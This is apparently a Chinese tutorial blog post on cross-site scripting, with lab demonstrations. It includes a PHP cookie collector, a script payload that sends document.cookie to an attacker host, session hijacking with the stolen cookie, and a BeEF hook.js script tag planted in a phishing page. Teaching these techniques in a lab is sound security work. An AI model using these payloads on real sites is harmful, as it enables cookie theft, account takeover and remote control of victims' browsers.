xss漏洞

xss漏洞

李文涛

2025-04-04 发布3 浏览 · 0 点赞 · 0 收藏

XSS(Cross - Site Scripting,跨站脚本攻击)

  • 反射型 XSS:恶意代码藏在链接里,用户点链接,服务器把代码 “反射” 回浏览器执行,用完就没(像一次性钓鱼)
  • 存储型 XSS:恶意代码存到网站服务器(如评论区),其他用户访问相关页面就会执行,长期有效(攻击范围广)
  • DOM 型 XSS:在浏览器端,利用前端代码修改页面结构,注入恶意代码执行,不经过服务器(纯前端搞破坏)

案例1.弹窗
在url中插入js代码,使得打开这个网页时,会跳出弹窗
![[屏幕截图 2025-04-03 220937.png]]![[屏幕截图 2025-04-03 220940.png]]

案例2.获取用户cookie
在url中插入需要执行的脚本,当用户点击这个网页后,将获取到的cookie写入cookie.txt文件中
将脚本get写到服务器目录下

<?php
header("Access-Control-Allow-Origin: *");#允许跨域
$cookie = $_GET['cookie'];
file_put_contents('cookie.txt', $cookie);
?>

执行url

<script>document.location="http://192.168.9.211/getcookie.php?cookie="+document.cookie</script>

document.location 用于重定向,把用户导向攻击者的地址,同时拼接 document.cookie,获取用户的 cookie
随后生成了文件,得到了cookie
![[屏幕截图 2025-04-04 005425.png]]
重新进入登录页面,直接通过前端修改cookie的值,然后删除url中的login.php直接通过cookie登录
![[屏幕截图 2025-04-04 005708.png]]![[屏幕截图 2025-04-04 005929.png]]
案例3:木马钓鱼
当用户点击钓鱼链接、运行带有木马的文件后,木马程序会在目标设备上自动安装或执行。可能通过脚本执行、利用系统漏洞等方式实现。
利用beef网页钓鱼
准备代码

<script src="http://192.168.154.133:3000/hook.js"></script>

将攻击代码放到钓鱼网站里,诱使用户点击
![[屏幕截图 2025-04-04 025207.png]]
“钩子” 代码执行后,会与 BeEF 控制端建立连接,使得渗透测试人员可以从浏览器内部对目标系统进行一系列操作,如获取浏览器及系统信息、执行命令、发起进一步攻击等 。

请前往 登录/注册 即可发表您的看法…